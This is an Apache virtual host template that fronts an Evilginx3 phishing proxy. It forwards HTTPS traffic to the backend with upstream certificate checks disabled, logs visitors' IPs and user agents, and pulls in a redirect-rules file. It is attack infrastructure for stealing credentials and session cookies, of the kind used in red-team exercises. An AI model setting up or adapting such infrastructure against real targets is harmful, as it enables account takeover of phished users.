<VirtualHost *:443>
    ServerAlias evilginx3.template 
    SSLEngine on
    SSLProxyEngine On
    SSLProxyVerify none 
    SSLProxyCheckPeerCN off
    SSLProxyCheckPeerName off
    SSLProxyCheckPeerExpire off
    SSLCertificateFile    
    SSLCertificateKeyFile    
    ProxyPreserveHost on
    ProxyPass / https://evilginx3:8443/
    ProxyPassReverse / https://evilginx3:8443/
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access_evilginx3.log "%h \"%r\" \"%{Referer}i\" \"%{User-Agent}i\""
    Include /etc/apache2/redirect.rules
</VirtualHost>
